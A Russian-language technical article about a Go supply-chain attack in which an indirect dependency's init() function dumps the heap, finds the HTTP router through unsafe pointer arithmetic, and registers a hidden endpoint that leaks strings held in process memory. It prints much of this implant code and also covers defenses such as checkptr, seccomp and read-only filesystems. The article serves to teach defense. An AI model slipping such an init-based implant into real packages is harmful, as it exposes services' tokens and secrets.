Как незаметная indirect-зависимость в Go дописала ручку в ваш HTTP-сервер
Все примеры из статьи лежат в репозитории github.com/korableg/init-injection-example. Код «вредоноса» написан в учебных целях — чтобы показать класс проблемы, а не дать готовый инструмент. Запускайте только в песочнице.
История простая: у нас есть аккуратный сервис на net/http с единственной ручкой /time. Мы обновляем одну библиотеку через go get, ничего не меняя в своём коде. После рестарта в сервисе появляется ручка /__injected, которая отдаёт строки из памяти процесса. Мы её не регистрировали. Более того — пакет, который её зарегистрировал, формально в сервисе не используется.
Дальше — разбор, как такое вообще возможно, шаг за шагом: от модели зависимостей Go и функции init до сканирования кучи и unsafe.Pointer. И, конечно, как от этого защищаться.
Часть 1. Как Go видит зависимости
Чтобы понять атаку, нужно держать в голове три факта о модульной системе Go. Если вы уверенно читаете go.mod — можно пролистать до части 2.
1.1. Модуль начинается с go mod init
go mod init github.com/korableg/init-injection-example
Команда создаёт в корне go.mod. Путь модуля бывает двух видов:
для библиотеки — полный импортируемый путь (
github.com/org/lib), по которому её будут тянуть другие;для сервиса — может быть просто уникальным идентификатором, наружу его никто не импортирует.
Если сервис должен экспортировать пакеты (например, сгенерированные protobuf-контракты), под них заводят отдельный external-модуль с полным именем — его и импортируют соседи.
1.2. Один способ импорта на всё — go get
go get github.com/igrmk/treemap/v2@v2.0.1
go get — универсальный способ затянуть любую зависимость: библиотеку, инструмент, обновление версии. Именно эта команда в нашей истории и станет точкой входа атаки.
1.3. Анатомия go.mod
module github.com/korableg/init-injection-example/lib // 1. путь модуля go 1.26.3 // 2. версия языка (минимальная) replace github.com/korableg/init-injection-example/db => ../db // 3. подмена require github.com/korableg/init-injection-example/db v0.0.0-... // 4. прямая зависимость require ( // 5. indirect-зависимости github.com/burntcarrot/heaputil v0.0.0-... // indirect github.com/igrmk/treemap/v2 v2.0.1 // indirect golang.org/x/exp v0.0.0-... // indirect ) exclude github.com/burntcarrot/heaputil v1.0.0 // 6. исключение версии
Шесть элементов:
Путь модуля — разобрали выше.
Версия языка — минимальная версия Go, чьи языковые фичи разрешено использовать в модуле; компилятор отвергнет всё, что появилось позже. За конкретный тулчейн отвечает отдельная директива
toolchain(если её нет — берётся версия из строкиgo).replace— подменяет зависимость на форк или на локальную директорию.Прямая зависимость — то, что вы сами добавили через
go get.Indirect-зависимость (я называю их «теневыми») — то, что вы явно не импортируете, но что тянут используемые вами пакеты. Помечается комментарием
// indirect.exclude— запрет конкретной версии.
Запомните пункт 5 — // indirect. Вся интрига статьи держится на одном вопросе: что Go выполняет в indirect-зависимостях, которые ваш код напрямую не вызывает?
Часть 2. init — тихий вход
2.1. Сигнатура
init — функция без аргументов и без возвращаемого значения:
func init() { // ... }
Особенности:
располагать её можно где угодно в пакете (не обязательно сверху);
в одном пакете может быть несколько функций
init— хоть в каждом файле.
2.2. Три свойства, которые надо помнить
Неявный вызов.
initвыполняется автоматически, до любого вашего кода, доmain.Порядок. Несколько
initв пакете выполняются в порядке объявления. Аinitзависимых пакетов выполняются доinitвашего пакета — в порядке импорта.Назначение. Классически
initиспользуют для настройки глобального состояния, регистрации обработчиков и прочей подготовки до старта основной логики.
2.3. Канонический пример — database/sql
Драйверы БД в Go регистрируются именно через init. Стандартная библиотека предоставляет sql.Register:
package db import ( "database/sql" "database/sql/driver" "fmt" ) func init() { fmt.Println("YAY! db driver was registered ?") sql.Register("fooDB", &drv{}) } type drv struct{} func (*drv) Open(name string) (driver.Conn, error) { return nil, nil }
Поэтому драйверы и подключают «пустым» импортом:
import _ "github.com/jackc/pgx/v5/stdlib" // postgres import _ "github.com/go-sql-driver/mysql" // mysql import _ "github.com/ClickHouse/clickhouse-go" // clickhouse
Вы не вызываете из пакета ни одной функции — но его init уже зарегистрировал драйвер. Удобно. И ровно здесь зарыта мина.
2.4. Что не так с init

Первые три пункта — про читаемость и тестируемость. А вот четвёртый — главный герой статьи:
initвыполняется даже в indirect-зависимости, которую ваш код фактически не использует. Достаточно, чтобы пакет попал в граф сборки.
Дальше покажу, что это значит на практике.
Часть 3. Подопытный сервис
Смоделируем реалистичную ситуацию. Есть сервис example-service с одной ручкой /time:
// example-service/cur_timestamp.go type curTimestamp struct{} func (*curTimestamp) Handler() (string, http.Handler) { return "GET /time", http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) _, _ = w.Write([]byte(strconv.FormatInt(time.Now().Unix(), 10))) }) }
HTTP-сервер мы оборачиваем во внутреннюю библиотеку lib — представьте «общую обвязку» с единым конфигом, которую переиспользуют все сервисы компании:
// example-service/main.go func main() { cfg := config.NewConfig() srvr := rest.New(cfg.Rest, &curTimestamp{}) go srvr.Serve() // ... graceful shutdown }
Конфиг библиотеки — это удобная композитная структура: настройки REST, базы данных и некоего сервиса foo (он тут для массовки):
// lib/config/config.go package config import ( "github.com/korableg/init-injection-example/db" "github.com/korableg/init-injection-example/lib/foo" "github.com/korableg/init-injection-example/lib/rest" ) type Config struct { Rest *rest.Config `yaml:"rest"` DB *db.Config `yaml:"db"` // <-- вот эта строчка решает всё Foo *foo.Config `yaml:"foo"` }
Обратите внимание на поле DB *db.Config. Сервис example-service не работает с базой. Он отдаёт таймстамп. Но его «общий конфиг» из библиотеки ссылается на тип db.Config — а значит, пакет db попадает в граф сборки.
Смотрим go.mod сервиса:
module example go 1.26.3 replace github.com/korableg/init-injection-example/lib => ../lib replace github.com/korableg/init-injection-example/db => ../db require github.com/korableg/init-injection-example/lib v0.0.0-... require ( github.com/burntcarrot/heaputil v0.0.0-... // indirect github.com/igrmk/treemap/v2 v2.0.1 // indirect github.com/korableg/init-injection-example/db v0.0.0-... // indirect <-- !!! golang.org/x/exp v0.0.0-... // indirect )
db помечен как // indirect. Сервис его напрямую не импортирует — он пришёл транзитивно через lib/config.
Цепочка зависимостей

Запускаем сервис — и в логах появляется:
YAY! db driver was registered ?
init() из пакета db выполнился, хотя ни одной функции из db мы не вызывали. Просто потому что тип db.Config упомянут в структуре конфига. Пока что безобидно — зарегистрировался драйвер. Но это доказательство концепции: чужой init уже исполняется в адресном пространстве нашего процесса.
Часть 4. Обновление, которое всё меняет
Теперь смоделируем то, что происходит в реальной жизни постоянно: мы делаем go get и обновляем db до новой версии. В код сервиса мы не заглядываем — «там же только конфиг базы». А в новой версии init теперь выглядит так:
func init() { fmt.Println("YAY! db driver was registered ?") sql.Register("fooDB", &drv{}) inject() // <-- вот это приехало с обновлением }
Заглянем в inject. И тут начинается самое интересное — функция оперирует unsafe.Pointer. Зачем? Разберёмся по частям.
Часть 5. Краткий ликбез по unsafe.Pointer
Чтобы понять эксплойт, нужно понимать два типа.
unsafe.Pointer против обычного указателя
Обычный указатель в Go типизирован: *int указывает на int, и компилятор это контролирует. unsafe.Pointer — это как void * в C: его можно преобразовать в указатель на любой тип, и компилятор не проверяет безопасность типов.
uintptr — указатель как число

unsafe.Pointer— настоящий указатель, garbage collector его отслеживает.uintptr— беззнаковое целое размером с указатель. Над ним доступна арифметика (надunsafe.Pointer— нет). Но GC его не видит.
Почему нельзя гонять uintptr → unsafe.Pointer между выражениями
Из-за сборщика мусора. Как только адрес «сполз» в uintptr, GC перестаёт считать объект живым и может его переместить или собрать. Превратите uintptr обратно в указатель позже — и попадёте на освобождённую/перемещённую память. В лучшем случае — segfault.
Валидно (всё в одном выражении — компилятор и GC видят связь):
func Test_UnsafeValidOp(t *testing.T) { k := []byte{1, 2, 3, 4, 5, 6} p := (*byte)(unsafe.Pointer(uintptr(unsafe.Pointer(&k[0])) + 2)) fmt.Println(*p) // 3 }
Невалидно (адрес «полежал» в переменной uP между выражениями):
func Test_UnsafeInvalidOp(t *testing.T) { k := []byte{1, 2, 3, 4, 5, 6} uP := uintptr(unsafe.Pointer(&k[0])) // адрес ушёл в uintptr... p := (*byte)(unsafe.Pointer(uP + 2)) // ...и используется в другом выражении fmt.Println(*p) }
Такие конструкции ловят линтеры, go vet и checkptr. Но есть «легальный» обход — unsafe.Add, который умеет арифметику над unsafe.Pointer без перехода в uintptr:
func Test_UnsafeValidOp2(t *testing.T) { k := []byte{1, 2, 3, 4, 5, 6} var offset uintptr = 2 uP := unsafe.Pointer(&k[0]) p := (*byte)(unsafe.Add(uP, offset)) // линтер считает валидным fmt.Println(*p) // 3 }
Именно unsafe.Add использует inject, чтобы спокойно делать арифметику над адресами и не привлекать внимания инструментов.
Часть 6. Как inject находит и захватывает HTTP-роутер
Теперь, вооружившись знанием про unsafe, разберём inject целиком. Общая идея:

6.1. Дамп кучи
Чтобы найти роутер в памяти, inject снимает дамп всей кучи штатным средством runtime/debug:
func objectsFromHeap() ([]*record.ObjectRecord, error) { f, err := os.CreateTemp(os.TempDir(), "*") if err != nil { return nil, err } defer func() { f.Close() os.Remove(f.Name()) }() // Пишем дамп кучи в файл. // Формат: https://go.dev/wiki/heapdump15-through-heapdump17 debug.WriteHeapDump(f.Fd()) if _, err = f.Seek(0, 0); err != nil { return nil, err } return parseDump(bufio.NewReader(f)) }
debug.WriteHeapDump принимает один аргумент — файловый дескриптор. Поэтому сначала создаётся временный файл, в него пишется дамп, затем он парсится библиотекой heaputil в список объектов. Все адреса в дампе хранятся как беззнаковые целые. (Парсинг формата дампа — отдельная большая тема, см. ссылку в коде.)
6.2. Адрес → указатель через «нулевую базу»
Зная, что любой адрес — это смещение от начала виртуального адресного пространства, можно прибавить адрес объекта к нулевому указателю и получить рабочий unsafe.Pointer:
ptr := unsafe.Add(unsafe.Pointer(nil), obj.Address)
6.3. Распознавание http.ServeMux по разметке памяти
Дальше нужно понять, какой из объектов кучи — это http.ServeMux. Для этого в пакете заранее объявлены структуры, повторяющие внутреннюю разметку приватных типов из net/http:
type ( // Структуры повторяют верстку внутренних типов http.ServeMux routingIndexKey struct { pos int s string } segment struct { s string wild bool multi bool } pattern struct { str string method string host string segments []segment loc string } routingIndex struct { segments map[routingIndexKey][]*pattern multis []*pattern } )
Поскольку unsafe.Pointer можно привести к любому типу, а в памяти эти структуры лежат байт-в-байт как оригиналы из net/http, можно «надеть» их на сырой адрес и прочитать.
Распознавание идёт по нескольким опорным признакам.
Опорное значение №1 — реальный размер ServeMux в памяти. Здесь хитрость: объект в куче занимает не unsafe.Sizeof, а размер ближайшего класса аллокации (size class) Go — рантайм округляет вверх. Размер класса вычисляют красивым хаком:
func calculateSizeClass(n uintptr) int { b := append([]byte(nil), make([]byte, n)...) return cap(b) // рантайм подогнал capacity под нужный size class }
Берём n-байтный слайс, аппендим в пустой безразмерный — рантайм подгоняет capacity под класс памяти. cap и есть реальный размер. (Классы памяти — см. runtime/sizeclasses.go.)
Опорные значения №2 — смещения и количество полей под конкретную разметку ServeMux. Собираем всё вместе:
muxSize = unsafe.Sizeof(http.ServeMux{}) muxSizeClass = calculateSizeClass(muxSize) var ( muxFirstOffset uint64 = 24 muxRoutingIndexOffset = 96 muxFieldsCount = 10 ) for _, obj := range objects { ptr := unsafe.Add(unsafe.Pointer(nil), obj.Address) if len(obj.Fields) == muxFieldsCount && obj.Fields[0] == muxFirstOffset && len(obj.Contents) == muxSizeClass { ri := (*routingIndex)(unsafe.Add(ptr, muxRoutingIndexOffset)) if ri != nil && len(ri.segments) > 0 { mux = (*http.ServeMux)(ptr) // нашли роутер! } } addContents(obj, tm) }
Объект-кандидат проверяется по трём признакам: число полей == 10, первое поле == 24, размер == ожидаемому size class. Затем по смещению routingIndexOffset достаётся routingIndex и проверяется, что в нём есть зарегистрированные маршруты. Совпало — перед нами живой *http.ServeMux нашего сервиса.
6.4. Заодно — сбор строк из кучи
Параллельно inject складывает в упорядоченный TreeMap[uintptr, string] весь валидный UTF-8-контент объектов кучи:
func addContents(obj *record.ObjectRecord, tm *contentTree) { if !utf8.Valid(obj.Contents) { return } data := strings.Map(func(r rune) rune { if unicode.IsGraphic(r) { return r } return -1 }, string(obj.Contents)) if len(data) == 0 { return } tm.Set(uintptr(obj.Address), data) }
Это — конфиги, токены, DSN-ы, любые строки, которые сервис держит в памяти.
6.5. Финал — регистрация чужой ручки
mux.HandleFunc("/__injected", handleFunc(tm))
handleFunc просто отдаёт собранную мапу адрес → строка:
return func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) w.Write(data) // "0x... <строка из кучи>\n" построчно }
Запускаем сервис, идём на /__injected — и получаем дамп строкового содержимого процесса. Ручку никто из нас не регистрировал; её дописал init пакета, который в сервисе даже не используется напрямую.
И отдельно про инструменты. Обычная сборка (go build) и go vet тревогу не поднимают — код компилируется и спокойно работает. Гонки здесь тоже нет: в чистом race-репорте пусто, потому что inject не пишет в общую память конкурентно. Но есть нюанс, важный для CI: флаг -race неявно включает checkptr — рантайм-проверку корректности арифметики указателей. И вот она этот эксплойт ловит — сборка с -race падает с фатальной ошибкой ровно на unsafe.Add(unsafe.Pointer(nil), obj.Address):
fatal error: checkptr: pointer arithmetic result points to invalid allocation .../db/harmful.go:179
То есть незаметным эксплойт остаётся только для «ванильного» пайплайна. Стоит собрать или прогнать тесты с -race (или явно с checkptr) — и трюк с «нулевой базой» вскрывается. Это, кстати, готовый аргумент гонять -race/checkptr в CI (вернёмся к этому в части 7.2).
Дальше включайте фантазию: вместо «вывести строки» можно подменить хендлеры, проксировать трафик, утащить секреты.
Часть 7. Как с этим бороться
7.1. Главное — гранулируйте зависимости
Корень проблемы — композитный конфиг в библиотеке. Поле DB *db.Config втащило весь пакет db (с его init) в сервис, которому база не нужна.

Правило: в библиотеках не делайте структур-агрегатов из чужих пакетов. Пусть будет отдельный rest.Config, отдельный db.Config, и каждый сервис подключает только то, что реально использует. Это не спасёт сервисы, которым база нужна по-настоящему, но как минимум вынесет проблему из тех, кому она вообще ни к чему.
7.2. Инструменты
Инструмент |
Что делает |
|---|---|
vendoring ( |
Кладёт копии всех зависимостей в |
deadcode |
Ищет недостижимый код. В отличие от |
GCI |
Упорядочивает импорты по заданным правилам — дисциплина в импортах помогает замечать лишнее. |
govulncheck |
Сканирует проект на известные уязвимости (NVD, GHSA, база Go vuln). Есть веб-интерфейс — пакет можно проверить до подключения. |
checkptr |
Рантайм-проверки корректности арифметики указателей. Именно она роняет наш эксплойт на |
7.3. Перекрыть атаке кислород на уровне ОС: запрет на создание файлов
Предыдущие меры — про то, чтобы зловред вообще не попал в сборку. Но можно поставить ещё один рубеж — на уровне ОС, исходя из того, что эксплойту физически нужно для работы.
Вспомним часть 6.1: inject не умеет читать кучу напрямую. Ему нужно снять дамп через debug.WriteHeapDump(f.Fd()), а эта функция требует записываемый файловый дескриптор (по документации — обычный файл или сокет, не pipe). Поэтому эксплойт сначала зовёт os.CreateTemp(...), который под капотом делает системный вызов openat(2) с флагом O_CREAT:

Если процесс не может создать файл в нужном месте — os.CreateTemp вернёт ошибку, objectsFromHeap отвалится с err, и inject просто молча выйдет (он глотает ошибку: if err != nil { return }). Дампа кучи нет — ServeMux не найден — ручка не зарегистрирована. Цепочка рвётся на самом первом «грязном» сисколле.
Большинству сервисов запись на диск во время работы вообще не нужна (логи идут в stdout, состояние — в БД). Значит, можно отобрать у процесса право создавать файлы — либо целиком, либо разрешив запись только в один заранее известный путь.
Важно делать это снаружи, на уровне оркестратора, а не из кода сервиса. Соблазн «включить ограничение в начале main» не сработает: init indirect-зависимостей выполняется до main, так что любую защиту, поднятую из своего же кода, зловред в init просто опередит. Ограничение, навешенное контейнером/ядром ещё до старта процесса, этой дыры лишено.
seccomp-BPF — фильтр системных вызовов
seccomp-BPF режет по самим сисколлам. Вы описываете BPF-фильтр (обычно по allowlist-принципу, как в дефолтном профиле Docker) и запрещаете процессу вызывать openat/creat/open с флагами создания. Тогда любая попытка создать файл — включая os.CreateTemp из inject — упрётся в EPERM/EACCES ещё на уровне ядра.
Применяют это на уровне оркестратора:
Docker —
--security-opt seccomp=profile.jsonс кастомным профилем без файлосоздающих сисколлов;Kubernetes —
seccompProfileвsecurityContextпода;плюс ортогональные меры —
readOnlyRootFilesystem: trueиemptyDir-том только туда, где запись реально нужна.
readOnlyRootFilesystem сам по себе уже ломает наш эксплойт: os.TempDir() по умолчанию указывает в /tmp, и если корневая ФС только для чтения — создать там временный файл не выйдет.
Чем это отличается от мер выше
Гранулирование зависимостей, вендоринг и govulncheck не дают зловреду попасть в сервис. Ограничение сисколлов исходит из обратного допущения — «предположим, он уже внутри» — и отбирает у него инструменты. Это defense in depth: даже если вредонос проскочил ревью, без права создать файл он не снимет дамп кучи и не доберётся до ServeMux.
7.4. Гигиена обновлений
Из истории вытекает несколько практик, которые стоит закрепить в команде:
читайте диф зависимостей при обновлении — особенно если в нём появляется
unsafe,runtime/debug,os.CreateTemp, работа с дескрипторами;держите
vendor/под контролем ревью;прогоняйте
govulncheckв CI и проверяйте новые пакеты на vuln.go.dev до подключения;не тащите в библиотеки композитные конфиги — гранулируйте;
в проде запускайте сервисы с
readOnlyRootFilesystemи урезанным seccomp-профилем — это дёшево и ломает целый класс атак, завязанных на запись файлов.
Итог
Цепочка атаки оказалась короткой и абсолютно «легальной» с точки зрения компилятора:
Библиотека держит композитный конфиг с полем
DB *db.Config.Тип
db.Configтащит весь пакетdbв граф сборки сервиса — как indirect-зависимость.initпакетаdbвыполняется, хотя сервис не вызывает изdbни строчки.initснимает дамп кучи, черезunsafe.Pointerнаходитhttp.ServeMuxпо разметке памяти и дописывает свою ручку.Обычная сборка и
go vetтревогу не поднимают — спасает только сборка сcheckptr(в том числе через-race), которая роняет эксплойт на арифметике указателей.
init и unsafe — мощные и полезные механизмы. Но ровно их «удобство» — неявность init и бесконтрольность типов у unsafe — превращает невинное обновление зависимости в RCE-подобный сценарий. Защита строится в два эшелона. Первый — не дать зловреду попасть в сборку: гранулируйте зависимости, читайте дифы, вендорите и сканируйте. Второй — на случай, если он всё же проскочил: урежьте процессу права на уровне ОС снаружи, через оркестратор. Конкретно этому эксплойту для работы нужно создать файл под дамп кучи — запретите создание файлов (seccomp-профиль, readOnlyRootFilesystem), и цепочка порвётся на первом же сисколле.
Код для самостоятельного изучения — github.com/korableg/init-injection-example. Раскомментируйте inject() в db/drv.go, поднимите example-service и сходите на /__injected.
Спасибо за внимание.
Комментарии (3)

paramtamtam
17.06.2026 13:27Наконец-то интересная и искренне любопытная статья, а не очередной нейро-слоп. Спасибо!

evgeniy_kudinov
17.06.2026 13:27Познавательно про indirect-зависимость и inject зловред, хорошо расписали
Void-Cowboy
спасибо за новые мысли под вечер
всегда держал в голове, что бездумное использование сторонних пакетов чревато, но вот про такой вектор атаки даже не задумывался. Даже несколько векторов по факту
я как раз заканчиваю одну тулзу для го-модулей в том числе - похоже прийдется подумать за то, что бы "подсвечивать" возможные опасные места по типу наличия replace